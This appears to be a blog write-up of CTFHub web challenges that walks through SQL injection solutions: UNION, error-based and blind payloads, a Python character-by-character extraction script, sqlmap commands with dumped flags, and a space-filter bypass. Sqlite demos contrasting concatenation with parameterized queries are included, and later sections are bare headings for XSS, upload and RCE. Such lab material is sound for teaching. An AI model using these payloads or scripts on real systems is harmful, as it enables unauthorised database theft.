CTFHub Web Writeups

Web

SQL Injection

Integer Injection

The back-end query is `select * from news where id=<id>`, with the id parameter inserted unquoted. Each step below shows the full query as executed and the page's output; id=65535 matches no news row, so the only row rendered is the one produced by the UNION.

select * from news where id=1

ID: 1
Data: ctfhub

select * from news where id=65535 union select 1,database()

ID: 1
Data: sqli

select * from news where id=65535 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

ID: 1
Data: news,flag

select * from news where id=65535 union select 2,group_concat(column_name) from information_schema.columns where table_name="flag"

ID: 2
Data: flag

select * from news where id=65535 union select 1,flag from sqli.flag

ID: 1
Data: ctfhub{b4e5f56292df47714a3505cb8e7db7ec3841564e}

String Injection

Here the id is wrapped in single quotes, so the payload closes the quote and comments out the trailing one with `#`.

select * from news where id='65535' union select 1,database()#'
ID: 1
Data: sqli

select * from news where id='65535' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#'
ID: 1
Data: news,flag

select * from news where id='65535' union select 1,group_concat(column_name) from information_schema.columns where table_name="flag"#'
ID: 1
Data: flag

select * from news where id='65535' union select 1,flag from sqli.flag#'
ID: 1
Data: ctfhub{55f091a136f1d09a3a47a0199345ec740f1b19bb}
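An added example (not code from the page or from CTFHub) that reproduces the integer and string variants above against an in-memory sqlite database, with a parameterized query beside the vulnerable one. The `news`/`flag` schema and the flag value are constructed; `sqlite_master` stands in for `information_schema.tables`, and `-- ` for MySQL's `#` comment, because sqlite has neither.

```python
import sqlite3

# Constructed sample schema: mirrors the challenge's `sqli` database
# (a `news` table and a one-row `flag` table); the flag value is made up.
def make_db():
    db = sqlite3.connect(':memory:')
    db.executescript("""
        create table news(id integer, data text);
        insert into news values (1, 'ctfhub'), (2, 'second post');
        create table flag(flag text);
        insert into flag values ('ctfhub{constructed_example_flag}');
    """)
    return db

def lookup_vulnerable(db, user_id, quoted=False):
    """The challenge's pattern: the id parameter is concatenated into the SQL.
    quoted=False is the integer variant, quoted=True the string variant."""
    if quoted:
        sql = "select * from news where id='%s'" % user_id
    else:
        sql = "select * from news where id=%s" % user_id
    return db.execute(sql).fetchall()

def lookup_safe(db, user_id):
    """Hardened form: the value is bound as a parameter and is never parsed
    as SQL, so a UNION payload simply matches no row."""
    return db.execute("select * from news where id=?", (user_id,)).fetchall()

def union_payload(expr, source, quoted=False):
    """Build the injected id value. 65535 matches no news row, so the UNION
    row is the only one rendered. In the string variant the leading quote
    closes the application's quote and '-- ' comments out the trailing one
    (the page uses MySQL's '#'; sqlite only accepts '--')."""
    if quoted:
        return "65535' union select 1,%s from %s-- " % (expr, source)
    return "65535 union select 1,%s from %s" % (expr, source)

if __name__ == '__main__':
    db = make_db()
    for quoted in (False, True):
        # step 1: list tables (sqlite_master replaces information_schema.tables)
        tables = lookup_vulnerable(
            db, union_payload("group_concat(name)", "sqlite_master where type='table'", quoted), quoted)
        # step 2: read the flag through the same hole
        flag = lookup_vulnerable(db, union_payload("flag", "flag", quoted), quoted)
        print("quoted=%s tables=%s flag=%s" % (quoted, tables, flag))
    # the same payload against the parameterized query returns nothing
    print("parameterized:", lookup_safe(db, union_payload("flag", "flag")))
```

The two `lookup_*` functions differ by one thing only: whether the id reaches the parser as SQL text or as a bound value. The string variant needs both the closing quote and the comment; dropping either leaves an unbalanced quote and a syntax error rather than a result.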

Error-based Injection

`floor(rand(0)*2)` yields the fixed sequence 0,1,1,0,1,1,...; when that expression is part of the GROUP BY key next to `count(*)`, MySQL evaluates it again while inserting into the temporary result table and tries to insert a key it has already stored. The resulting "Duplicate entry" error message contains the key, i.e. whatever was concatenated before the `0x26` (`&`) separator.

select * from news where id=1 union select count(*),concat(database(),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
Query error: Duplicate entry 'sqli&1' for key 'group_key'

select * from news where id=1 union select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
Query error: Duplicate entry 'news&1' for key 'group_key'

select * from news where id=1 union select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
Query error: Duplicate entry 'flag&1' for key 'group_key'

select * from news where id=1 union select count(*),concat((select column_name from information_schema.columns where table_name="flag" limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
Query error: Duplicate entry 'flag&1' for key 'group_key'

select * from news where id=1 union select count(*),concat((select flag from sqli.flag limit 0,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x;
Query error: Duplicate entry 'ctfhub{1485dddbf741f771c95612e0c824f68e50e4ebaf}&1' for key 'group_key'

Boolean-based Blind Injection

https://blog.csdn.net/weixin_44732566/article/details/104417351

Script copied from the link above. The oracle is the expression `if(cond,1,(select table_name from information_schema.tables))`: when cond is true the query becomes `id=1` and the page prints `query_success`; when it is false the subquery returns more than one row, MySQL raises an error and the marker is absent.

import requests

urlOPEN = 'http://challenge-ef71d5f8c726bea8.sandbox.ctfhub.com:10080/?id='
# The page prints this marker only when the injected query returns a row.
mark = 'query_success'
# Characters tried for names; digits and underscore are included because
# identifiers may contain them.
CHARSET = 'sqcwertyuioplkjhgfdazxvbnm0123456789_'


def database_name():
    name = ''
    for j in range(1, 9):  # assume the database name has at most 8 characters
        for i in CHARSET:
            url = urlOPEN + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (j, i)
            r = requests.get(url)
            if mark in r.text:
                name = name + i
                print(name)
                break
        else:
            break  # no character matched: end of the name
    print('database_name:', name)


def table_name():
    names = []
    for k in range(0, 4):  # assume at most 4 tables
        name = ''
        for j in range(1, 9):  # assume table names have at most 8 characters
            for i in CHARSET:
                url = urlOPEN + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (k, j, i)
                r = requests.get(url)
                if mark in r.text:
                    name = name + i
                    break
            else:
                break
        names.append(name)
    print('table_name:', names)


def column_name():
    names = []
    for k in range(0, 3):  # assume the flag table has at most 3 columns
        name = ''
        for j in range(1, 9):  # assume column names have at most 8 characters
            for i in CHARSET:
                url = urlOPEN + 'if(substr((select column_name from information_schema.columns where table_name="flag" and table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (k, j, i)
                r = requests.get(url)
                if mark in r.text:
                    name = name + i
                    break
            else:
                break
        names.append(name)
    print('column_name:', names)


def get_data():
    name = ''
    for j in range(1, 50):  # assume the flag has at most 49 characters
        for i in range(32, 127):  # printable ASCII, compared by code point
            url = urlOPEN + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (j, i)
            r = requests.get(url)
            if mark in r.text:
                name = name + chr(i)
                print(name)
                break
        else:
            break
    print('value:', name)


if __name__ == '__main__':
    database_name()
    table_name()
    column_name()
    get_data()
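The script above asks one question per candidate character. An added example (not from the page or the linked post) that extracts the same `(select flag from flag)` value with a binary search over the code point, so each character costs about seven requests instead of up to ninety-five. The network is replaced by a constructed sqlite-backed oracle that answers exactly like the page (row returned or not); the flag value, the table contents and the request counter are assumptions. sqlite has no `if()` and no `ascii()`, so `CASE WHEN` and `unicode()` are used where the page's payloads use `if()` and `ascii()`.

```python
import sqlite3

FLAG = 'ctfhub{constructed_example_flag}'  # constructed sample value, not from the page

def make_oracle():
    """Stand-in for the challenge page. The returned function takes the raw
    id value, runs the concatenated query against a constructed in-memory
    database and returns True iff a row came back, i.e. iff the real page
    would print 'query_success'. oracle.calls counts the requests made."""
    db = sqlite3.connect(':memory:')
    db.executescript(
        "create table news(id integer, data text);"
        "insert into news values (1, 'ctfhub');"
        "create table flag(flag text);")
    db.execute("insert into flag values (?)", (FLAG,))

    def oracle(payload):
        oracle.calls += 1
        try:
            return bool(db.execute("select * from news where id=" + payload).fetchall())
        except sqlite3.Error:
            return False  # the page's false branch deliberately errors out
    oracle.calls = 0
    return oracle

def truthy(cond):
    """Turn a boolean SQL condition into the id value 1 (row found) or 0
    (no row). The page uses MySQL's if(cond,1,...); sqlite has no if(),
    so CASE is used here."""
    return "(case when %s then 1 else 0 end)" % cond

def bsearch(oracle, expr, lo, hi):
    """Find the integer value of SQL expression expr, known to lie in
    [lo, hi], with 'expr > mid' probes: about log2(hi-lo) requests instead
    of one request per candidate value."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(truthy("%s>%d" % (expr, mid))):
            lo = mid + 1
        else:
            hi = mid
    return lo

def extract(oracle, subquery, maxlen=100):
    """Recover the string produced by subquery: first its length, then each
    character's code point. sqlite's unicode() plays the role of MySQL's
    ascii(); length() and substr() have the same names in both."""
    n = bsearch(oracle, "length(%s)" % subquery, 0, maxlen)
    return ''.join(
        chr(bsearch(oracle, "unicode(substr(%s,%d,1))" % (subquery, pos), 32, 126))
        for pos in range(1, n + 1))

if __name__ == '__main__':
    o = make_oracle()
    print(extract(o, "(select flag from flag)"), "in", o.calls, "requests")
```

Extracting the length first is what lets the loop stop cleanly: probing `substr()` past the end of the string yields NULL, every comparison is false, and a character-by-character search would silently return the lower bound instead of ending.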

Time-based Blind Injection

https://www.cnblogs.com/0yst3r-2046/p/12486654.html

python3 sqlmap.py -u http://challenge-bd60f7e66abe915e.sandbox.ctfhub.com:10080/?id=1 --dbs

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sqli

python3 sqlmap.py -u http://challenge-bd60f7e66abe915e.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

Database: sqli
[2 tables]
+------+
| flag |
| news |
+------+

python3 sqlmap.py -u http://challenge-bd60f7e66abe915e.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns --dump

Database: sqli
Table: flag
[1 column]
+--------+--------------+
| Column | Type |
+--------+--------------+
| flag | varchar(100) |
+--------+--------------+

Database: sqli
Table: flag
[1 entry]
+--------------------------------------------------+
| flag |
+--------------------------------------------------+
| ctfhub{1b434bc37227050f91a3c6d89839c3d46caddc27} |
+--------------------------------------------------+

MySQL Structure

SQL Injection: sqlmap Advanced

python3 sqlmap.py -u http://challenge-af3aba0b3276526f.sandbox.ctfhub.com:10080/?id=1 --dbs

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sqli

Database: sqli
[2 tables]
+------------+
| news |
| yqoedxnbyv |
+------------+

python3 sqlmap.py -u http://challenge-af3aba0b3276526f.sandbox.ctfhub.com:10080/?id=1 -D sqli -T yqoedxnbyv --columns

Database: sqli
Table: yqoedxnbyv
[1 column]
+------------+--------------+
| Column | Type |
+------------+--------------+
| xlmnukvowy | varchar(100) |
+------------+--------------+

python3 sqlmap.py -u http://challenge-af3aba0b3276526f.sandbox.ctfhub.com:10080/?id=1 -D sqli -T yqoedxnbyv --columns --dump

Database: sqli
Table: yqoedxnbyv
[1 entry]
+--------------------------------------------------+
| xlmnukvowy |
+--------------------------------------------------+
| ctfhub{f1a6d4ca1299a361ac6c24a3467eacad28e33462} |
+--------------------------------------------------+

Cookie Injection

https://www.cnblogs.com/0yst3r-2046/p/12493132.html

sqlmap only tests Cookie values from `--level 2` upward (User-Agent and Referer from `--level 3`), so the level flag is required here.

python3 sqlmap.py -u "http://challenge-2d4b0d8e7383273a.sandbox.ctfhub.com:10080/" --cookie "id=1" --dbs --level 2

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sqli

python3 sqlmap.py -u "http://challenge-2d4b0d8e7383273a.sandbox.ctfhub.com:10080/" --cookie "id=1" -D sqli --tables --level 2

Database: sqli
[2 tables]
+------------+
| news       |
| ylhikalyfo |
+------------+

python3 sqlmap.py -u "http://challenge-2d4b0d8e7383273a.sandbox.ctfhub.com:10080/" --cookie "id=1" -T ylhikalyfo --columns --dump --level 2

Database: sqli
Table: ylhikalyfo
[1 entry]
+--------------------------------------------------+
| purywifqom                                       |
+--------------------------------------------------+
| ctfhub{9fdae54dfbd16b2b8e8362efaa630d2e837ae597} |
+--------------------------------------------------+

User-Agent Injection

python3 sqlmap.py -u http://challenge-49938f0b2fa56832.sandbox.ctfhub.com:10080/ --level 3 --dbs

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sqli

python3 sqlmap.py -u http://challenge-49938f0b2fa56832.sandbox.ctfhub.com:10080/ --level 3 -D sqli --tables

Database: sqli
[2 tables]
+------------+
| news       |
| stjztvvqvb |
+------------+

python3 sqlmap.py -u http://challenge-49938f0b2fa56832.sandbox.ctfhub.com:10080/ --level 3 -T stjztvvqvb --columns --dump

Database: sqli
Table: stjztvvqvb
[1 entry]
+--------------------------------------------------+
| wckzncyvgh                                       |
+--------------------------------------------------+
| ctfhub{0103df815affd10439bf1ed48520d8f39618e590} |
+--------------------------------------------------+

Referer Injection

sqlmap tests the Referer header from `--level 3` upward; `--level 5` as used below covers it as well.

python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 --dbs

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sqli

python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 -D sqli --tables

Database: sqli
[2 tables]
+------------+
| news       |
| hfuiwsiotm |
+------------+

python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 -D sqli -T  hfuiwsiotm --columns

Database: sqli
Table: hfuiwsiotm
[1 column]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| zuzhumkhnd | varchar(100) |
+------------+--------------+

python3 sqlmap.py -u http://challenge-915085e72c3c3f2b.sandbox.ctfhub.com:10080/ --level 5 -D sqli -T  hfuiwsiotm -C  zuzhumkhnd --dump

Database: sqli
Table: hfuiwsiotm
[1 entry]
+--------------------------------------------------+
| zuzhumkhnd                                       |
+--------------------------------------------------+
| ctfhub{d61711c950c746b5cc93caaf5ae33c1dfd2f1cd0} |
+--------------------------------------------------+

Space Filtering

https://www.cnblogs.com/anweilx/p/13156216.html

65535/**/union/**/select/**/1,database()

ID: 1
Data: sqli

65535/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()

ID: 1
Data: zzmpdgadiv,news

65535/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="zzmpdgadiv"

ID: 1
Data: bxphkegikc

65535/**/union/**/select/**/1,bxphkegikc/**/from/**/zzmpdgadiv

ID: 1
Data: ctfhub{93c21f537ae0bd573387788c7c4e1bf71e64d233}
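An added example (not code from the page or from CTFHub) showing why the `/**/` payloads above get through: a constructed filter that rejects any space sits in front of the still-concatenated query, and the same UNION payload is accepted once every space is replaced by another separator the parser treats as whitespace. The table and column names are the ones the page found; the filter, the flag value and the in-memory sqlite schema are assumptions, and `sqlite_master` stands in for `information_schema.tables`.

```python
import sqlite3

FLAG = 'ctfhub{constructed_example_flag}'  # constructed sample value, not from the page

def make_db():
    """Constructed stand-in for the challenge database, using the table and
    column names the page found (zzmpdgadiv / bxphkegikc)."""
    db = sqlite3.connect(':memory:')
    db.executescript(
        "create table news(id integer, data text);"
        "insert into news values (1, 'ctfhub');"
        "create table zzmpdgadiv(bxphkegikc text);")
    db.execute("insert into zzmpdgadiv values (?)", (FLAG,))
    return db

def passes_filter(value):
    """Assumed filter: the page only shows that payloads containing spaces
    are blocked, so this rejects any literal space character."""
    return ' ' not in value

def query(db, user_id):
    """Filtered but still concatenated query: None when the filter rejects
    the input, otherwise the rows returned."""
    if not passes_filter(user_id):
        return None
    return db.execute("select * from news where id=" + user_id).fetchall()

def bypass(payload, sep='/**/'):
    """Replace each space with another token separator the parser accepts:
    an empty comment /**/ as on the page, or a tab / newline (%09 / %0a when
    URL-encoded). Both MySQL and sqlite treat these as whitespace."""
    return payload.replace(' ', sep)

# the page's two steps, written with ordinary spaces
TABLES = "65535 union select 1,group_concat(name) from sqlite_master where type='table'"
READ_FLAG = "65535 union select 1,bxphkegikc from zzmpdgadiv"

if __name__ == '__main__':
    db = make_db()
    print("plain payload:", query(db, READ_FLAG))          # blocked by the filter
    print("tables:", query(db, bypass(TABLES)))
    print("flag via /**/:", query(db, bypass(READ_FLAG)))
    print("flag via tab:", query(db, bypass(READ_FLAG, '\t')))
```

Blocking one character does not change the fact that the input is parsed as SQL; any whitespace-equivalent token restores the original query, which is why the fix is a bound parameter as in the earlier example, not a longer blacklist.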

XSS

Reflected

Reference: https://blog.csdn.net/solitudi/article/details/107544165

File Upload

No validation

AntSword (中国蚁剑) download, installation and configuration (download included)

Writeup

Front-end validation

.htaccess

MIME bypass

%00 truncation

Double-written suffix

File header check

RCE

eval execution

File inclusion

php://input

Reading source code

Remote inclusion

Command injection: cat filtered, spaces filtered

Directory separator filtered, operators filtered, combined filtering exercise

Bypass disable_function

posted @ 2020-07-30 16:15 凯在想peach